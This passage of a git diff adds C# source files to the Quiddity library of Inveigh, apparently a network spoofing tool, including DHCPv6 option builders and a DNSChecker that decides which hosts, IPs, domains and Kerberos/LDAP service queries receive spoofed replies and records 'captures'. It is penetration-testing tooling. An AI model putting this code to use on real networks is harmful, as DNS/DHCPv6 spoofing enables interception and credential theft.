EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + class DHCPv6Option24 : DHCPv6Option + { + public byte[] SearchList { get; set; } + + public DHCPv6Option24() + { + + } + + public DHCPv6Option24(byte[] data) + { + ReadBytes(data, 0); + } + + public DHCPv6Option24(byte[] data, int index) + { + ReadBytes(data, index); + } + + public DHCPv6Option24(string dnsSuffix) + { + this.OptionCode = 24; + this.SearchList = Utilities.GetDNSNameBytes(dnsSuffix, true); + this.OptionLen = (ushort)this.SearchList.Length; + } + + public new void ReadBytes(byte[] data, int index) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = index; + this.OptionCode = packetReader.BigEndianReadUInt16(); + this.OptionLen = packetReader.BigEndianReadUInt16(); + this.SearchList = packetReader.ReadBytes(this.OptionLen); + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.BigEndianWrite(this.OptionCode); + packetWriter.BigEndianWrite(this.OptionLen); + packetWriter.Write(this.SearchList); + return memoryStream.ToArray(); + } + + } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option3.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option3.cs new file mode 100644 index 0000000..1727525 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option3.cs @@ -0,0 +1,107 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + class DHCPv6Option3 : DHCPv6Option + { + public byte[] IAID { get; set; } + public uint T1 { get; set; } + public uint T2 { get; set; } + public byte[] IANAOptions { get; set; } + + public DHCPv6Option3() + { + + } + + public DHCPv6Option3(byte[] data) + { + ReadBytes(data, 0); + } + + public DHCPv6Option3(byte[] data, int index) + { + ReadBytes(data, index); + } + + public DHCPv6Option3(string clientIPv6Address, uint lifetime, byte[] iaid) + { + this.OptionCode = 3; + this.T1 = 200; + this.T2 = 250; + this.IAID = iaid; + this.IANAOptions = new DHCPv6Option5().GetBytes(clientIPv6Address, lifetime); + } + + public new void ReadBytes(byte[] data, int index) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = index; + this.OptionCode = packetReader.BigEndianReadUInt16(); + this.OptionLen = packetReader.BigEndianReadUInt16(); + this.IAID = packetReader.ReadBytes(4); + this.T1 = packetReader.BigEndianReadUInt32(); + this.T2 = packetReader.BigEndianReadUInt32(); + this.IANAOptions = packetReader.ReadBytes(this.OptionLen - 12); + } + + } + + public byte[] GetBytes() + { + this.OptionLen = 40; + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.BigEndianWrite(this.OptionCode); + packetWriter.BigEndianWrite(this.OptionLen); + packetWriter.Write(this.IAID); + packetWriter.BigEndianWrite(this.T1); + packetWriter.BigEndianWrite(this.T2); + packetWriter.Write(this.IANAOptions); + return memoryStream.ToArray(); + } + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option39.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option39.cs new file mode 100644 index 0000000..2cf7928 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option39.cs @@ -0,0 +1,128 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + class DHCPv6Option39 : DHCPv6Option + { + // https://datatracker.ietf.org/doc/html/rfc4704 + + public byte Flags { get; set; } + public string DomainName { get; set; } + + public DHCPv6Option39() + { + + } + + public DHCPv6Option39(byte[] data) + { + ReadBytes(data, 0); + } + + public DHCPv6Option39(byte[] data, int index) + { + ReadBytes(data, index); + } + + public new void ReadBytes(byte[] data, int index) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = index; + this.OptionCode = packetReader.BigEndianReadUInt16(); + this.OptionLen = packetReader.BigEndianReadUInt16(); + this.Flags = packetReader.ReadByte(); + this.DomainName = ConvertName(packetReader.ReadBytes(this.OptionLen - 1)); + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.OptionCode); + packetWriter.Write(this.OptionLen); + packetWriter.Write(this.Flags); + packetWriter.Write(this.DomainName); + return memoryStream.ToArray(); + } + + } + + protected virtual string ConvertName(byte[]data) + { + string hostname = ""; + int hostnameLength = data[0]; + int index = 0; + int i = 0; + + do + { + int hostnameSegmentLength = hostnameLength; + byte[] hostnameSegment = new byte[hostnameSegmentLength]; + Buffer.BlockCopy(data, (index + 1), hostnameSegment, 0, hostnameSegmentLength); + hostname += Encoding.UTF8.GetString(hostnameSegment); + + if (hostnameLength + 1 == data.Length) + { + return hostname; + } + + index += hostnameLength + 1; + hostnameLength = data[index]; + i++; + + if (hostnameLength > 0) + { + hostname += "."; + } + + } + while (hostnameLength != 0 && i <= 127); + + return hostname; + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option5.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option5.cs new file mode 100644 index 0000000..7ed7a2b --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option5.cs @@ -0,0 +1,77 @@ +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Net; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + class DHCPv6Option5 : DHCPv6Option + { + // https://datatracker.ietf.org/doc/html/rfc3315#section-22.6 + + public byte[] IPv6Address { get; set; } + public uint PreferredLifetime { get; set; } + public uint ValidLifetime { get; set; } + public byte[] IAAddrOptions { get; set; } + + public DHCPv6Option5() + { + } + + public DHCPv6Option5(byte[] data) + { + ReadBytes(data, 0); + } + + public DHCPv6Option5(byte[] data, int index) + { + ReadBytes(data, index); + } + + public new void ReadBytes(byte[] data, int index) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = index; + this.OptionCode = packetReader.BigEndianReadUInt16(); + this.OptionLen = packetReader.BigEndianReadUInt16(); + this.IPv6Address = packetReader.ReadBytes(16); + this.PreferredLifetime = packetReader.BigEndianReadUInt32(); + this.ValidLifetime = packetReader.BigEndianReadUInt32(); + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.BigEndianWrite(this.OptionCode); + packetWriter.BigEndianWrite(this.OptionLen); + packetWriter.Write(this.IPv6Address); + packetWriter.BigEndianWrite(this.PreferredLifetime); + packetWriter.BigEndianWrite(this.ValidLifetime); + return memoryStream.ToArray(); + } + + } + + public byte[] GetBytes(string ipv6Address, uint lifeTime) + { + this.OptionCode = 5; + this.OptionLen = 24; + this.IPv6Address = IPAddress.Parse(ipv6Address).GetAddressBytes(); + this.PreferredLifetime = lifeTime; + this.ValidLifetime = lifeTime; + return GetBytes(); + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option6.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option6.cs new file mode 100644 index 0000000..d9dc4b6 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option6.cs @@ -0,0 +1,87 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + class DHCPv6Option6 : DHCPv6Option + { + public byte[] RequestedOptionCodes { get; set; } + + public DHCPv6Option6() + { + + } + + public DHCPv6Option6(byte[] data) + { + ReadBytes(data, 0); + } + + public DHCPv6Option6(byte[] data, int index) + { + ReadBytes(data, index); + } + + public new void ReadBytes(byte[] data, int index) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = index; + this.OptionCode = packetReader.BigEndianReadUInt16(); + this.OptionLen = packetReader.BigEndianReadUInt16(); + this.RequestedOptionCodes = packetReader.ReadBytes(this.OptionLen); + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.OptionCode); + packetWriter.Write(this.OptionLen); + packetWriter.Write(this.RequestedOptionCodes); + return memoryStream.ToArray(); + } + + } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option8.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option8.cs new file mode 100644 index 0000000..05929d9 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option8.cs @@ -0,0 +1,88 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + class DHCPv6Option8 : DHCPv6Option + { + public ushort ElapsedTime { get; set; } + + public DHCPv6Option8() + { + + } + + public DHCPv6Option8(byte[] data) + { + ReadBytes(data, 0); + } + + public DHCPv6Option8(byte[] data, int index) + { + ReadBytes(data, index); + } + + public new void ReadBytes(byte[] data, int index) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = index; + this.OptionCode = packetReader.BigEndianReadUInt16(); + this.OptionLen = packetReader.BigEndianReadUInt16(); + this.ElapsedTime = packetReader.BigEndianReadUInt16(); + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.OptionCode); + packetWriter.Write(this.OptionLen); + packetWriter.Write(this.ElapsedTime); + return memoryStream.ToArray(); + } + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/Values/DHCPv6DUIDLL.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/Values/DHCPv6DUIDLL.cs new file mode 100644 index 0000000..a24dd45 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/Values/DHCPv6DUIDLL.cs @@ -0,0 +1,72 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + public class DHCPv6DUIDLL + { + // https://datatracker.ietf.org/doc/html/rfc3315#section-9 + public ushort DUIDType { get; set; } + public ushort HardwareType { get; set; } + public byte[] LinkLayerAddress { get; set; } + + public DHCPv6DUIDLL() + { + + } + + public DHCPv6DUIDLL(byte[] data) + { + ReadBytes(data, 0); + } + + public DHCPv6DUIDLL(string linkLayerAddress) + { + byte[] linkLayerAddressData = new byte[6]; + int i = 0; + + foreach (string character in linkLayerAddress.Split(':')) + { + linkLayerAddressData[i] = Convert.ToByte(Convert.ToInt16(character, 16)); + i++; + } + + this.DUIDType = 3; + this.HardwareType = 1; + this.LinkLayerAddress = linkLayerAddressData; + } + + public void ReadBytes(byte[] data, int index) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = index; + this.DUIDType = packetReader.BigEndianReadUInt16(); + this.HardwareType = packetReader.BigEndianReadUInt16(); + this.LinkLayerAddress = packetReader.ReadBytes(6); + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.BigEndianWrite(this.DUIDType); + packetWriter.BigEndianWrite(this.HardwareType); + packetWriter.Write(this.LinkLayerAddress); + return memoryStream.ToArray(); + } + + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/Values/DHCPv6DUIDLLT.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/Values/DHCPv6DUIDLLT.cs new file mode 100644 index 0000000..45408bd --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/Values/DHCPv6DUIDLLT.cs @@ -0,0 +1,57 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + public class DHCPv6DUIDLLT + { + // https://datatracker.ietf.org/doc/html/rfc3315#section-9 + public ushort DUIDType { get; set; } + public ushort HardwareType { get; set; } + public uint Time { get; set; } + public byte[] LinkLayerAddress { get; set; } + + public DHCPv6DUIDLLT() + { + + } + + public DHCPv6DUIDLLT(byte[] data) + { + ReadBytes(data, 0); + } + + public void ReadBytes(byte[] data, int index) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = index; + this.DUIDType = packetReader.BigEndianReadUInt16(); + this.HardwareType = packetReader.BigEndianReadUInt16(); + this.Time = packetReader.BigEndianReadUInt32(); + this.LinkLayerAddress = packetReader.ReadBytes(6); + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.BigEndianWrite(this.DUIDType); + packetWriter.BigEndianWrite(this.HardwareType); + packetWriter.Write(this.LinkLayerAddress); + return memoryStream.ToArray(); + } + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSChecker.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSChecker.cs new file mode 100644 index 0000000..c70bd7d --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSChecker.cs @@ -0,0 +1,320 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.Support; +using System; +using System.Collections.Generic; + +namespace Quiddity.DNS +{ + class DNSChecker + { + public string[] IgnoreHosts { get; set; } + public string[] ReplyToHosts { get; set; } + public string[] IgnoreIPs { get; set; } + public string[] ReplyToIPs { get; set; } + public string[] IgnoreDomains { get; set; } + public string[] ReplyToDomains { get; set; } + public string[] Types { get; set; } + public string[] Services { get; set; } + public IList IPCaptures { get; set; } + public bool Enabled { get; set; } + public bool Inspect { get; set; } + public bool IPv6 { get; set; } + public bool Local { get; set; } + public bool Repeat { get; set; } + public string OutputReplyAllowed { get; set; } + public string OutputMessage { get; set; } + public string OutputInspect { get; set; } + public string OutputDisabled { get; set; } + public string OutputTypeDenied { get; set; } + public string OutputServiceDenied { get; set; } + public string OutputHostDenied { get; set; } + public string OutputIPDenied { get; set; } + public string OutputDomainDenied { get; set; } + public string OutputRepeat { get; set; } + + public DNSChecker() + { + this.OutputReplyAllowed = "response sent"; + this.OutputInspect = "inspect only"; + this.OutputDisabled = "disabled"; + this.OutputHostDenied = "host ignored"; + this.OutputIPDenied = "IP ignored"; + this.OutputDomainDenied = "domain ignored"; + this.OutputTypeDenied = "type ignored"; + this.OutputServiceDenied = "service ignored"; + this.OutputRepeat = "previous capture"; + } + + public bool Check(string name, string type, string clientIP) + { + + if (this.Inspect) + { + this.OutputMessage = this.OutputInspect; + return false; + } + else if (!this.Enabled) + { + this.OutputMessage = this.OutputDisabled; + return false; + } + else if (IsRepeat(clientIP)) + { + this.OutputMessage = this.OutputRepeat; + return false; + } + else if (!TypeIsAllowed(type)) + { + this.OutputMessage = this.OutputTypeDenied; + return false; + } + else if (!ServiceIsAllowed(name, type)) + { + this.OutputMessage = this.OutputServiceDenied; + return false; + } + else if (HostIsDenied(name) || FQDNIsDenied(name)) + { + this.OutputMessage = this.OutputHostDenied; + return false; + } + else if (!HostIsAllowed(name) && !FQDNIsAllowed(name)) + { + this.OutputMessage = this.OutputHostDenied; + return false; + } + else if (IPIsDenied(clientIP)) + { + this.OutputMessage = this.OutputIPDenied; + return false; + } + else if (!IPIsAllowed(clientIP)) + { + this.OutputMessage = this.OutputIPDenied; + return false; + } + else if (DomainIsDenied(name)) + { + this.OutputMessage = this.OutputDomainDenied; + return false; + } + else if (!DomainIsAllowed(name)) + { + this.OutputMessage = this.OutputDomainDenied; + return false; + } + + this.OutputMessage = this.OutputReplyAllowed; + return true; + } + + public bool IsRepeat(string clientIP) + { + + if (!this.Repeat && this.IPCaptures.Contains(clientIP)) + { + return true; + } + + return false; + } + + public bool TypeIsAllowed(string type) + { + + if (!Utilities.ArrayIsNullOrEmpty(this.Types) && (!Array.Exists(this.Types, element => element == type.ToUpper()))) + { + return false; + } + + return true; + } + + public bool ServiceIsAllowed(string name, string type) + { + + if (type.Equals("SRV") && TypeIsAllowed("SRV")) + { + string service = ""; + + if (name.StartsWith("_ldap.")) + { + service = "LDAP"; + } + else if (name.StartsWith("_kerberos.")) + { + service = "Kerberos"; + } + else if (name.StartsWith("_kpassword.")) + { + service = "KPassword"; + } + else if (name.StartsWith("_gc.")) + { + service = "GC"; + } + + if (!Utilities.ArrayIsNullOrEmpty(this.Services) && (!Array.Exists(this.Services, element => element == service.ToUpper()))) + { + return false; + } + } + + return true; + } + + public bool HostIsDenied(string name) + { + string host = (name.Split('.'))[0]; + + if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreHosts) && Array.Exists(this.IgnoreHosts, element => element == host.ToUpper())) + { + return true; + } + + return false; + } + + public bool HostIsAllowed(string name) + { + string host = (name.Split('.'))[0]; + + if (!Utilities.ArrayIsNullOrEmpty(this.ReplyToHosts) && !Array.Exists(this.ReplyToHosts, element => element == host.ToUpper())) + { + return false; + } + + return true; + } + + public bool FQDNIsDenied(string name) + { + + if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreHosts) && Array.Exists(this.IgnoreHosts, element => element == name.ToUpper())) + { + return true; + } + + return false; + } + + public bool FQDNIsAllowed(string name) + { + + if (!Utilities.ArrayIsNullOrEmpty(this.ReplyToHosts) && !Array.Exists(this.ReplyToHosts, element => element == name.ToUpper())) + { + return false; + } + + return true; + } + + public bool IPIsDenied(string clientIP) + { + + if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreIPs) && Array.Exists(this.IgnoreIPs, element => element == clientIP.ToUpper())) + { + return true; + } + + return false; + } + + public bool IPIsAllowed(string clientIP) + { + + if (!Utilities.ArrayIsNullOrEmpty(this.ReplyToIPs) && !Array.Exists(this.ReplyToIPs, element => element == clientIP.ToUpper())) + { + return false; + } + + return true; + } + + public bool DomainIsDenied(string domain) + { + int index = domain.IndexOf("."); + + while (index > -1) + { + + if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreDomains) && Array.Exists(this.IgnoreDomains, element => element == domain.ToUpper())) + { + return true; + } + + + index = domain.IndexOf("."); + + if (index > -1) + { + domain = domain.Substring(index).TrimStart('.'); + } + + } + + return false; + } + + public bool DomainIsAllowed(string domain) + { + int index = domain.IndexOf("."); + + if (index == -1 || Utilities.ArrayIsNullOrEmpty(this.ReplyToDomains)) + { + return true; + } + + while (index > -1) + { + + if (Array.Exists(this.ReplyToDomains, element => element == domain.ToUpper())) + { + return true; + } + + index = domain.IndexOf("."); + + if (index > -1) + { + domain = domain.Substring(index).TrimStart('.'); + } + + } + + return false; + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSHeader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSHeader.cs new file mode 100644 index 0000000..bd68c81 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSHeader.cs @@ -0,0 +1,181 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER 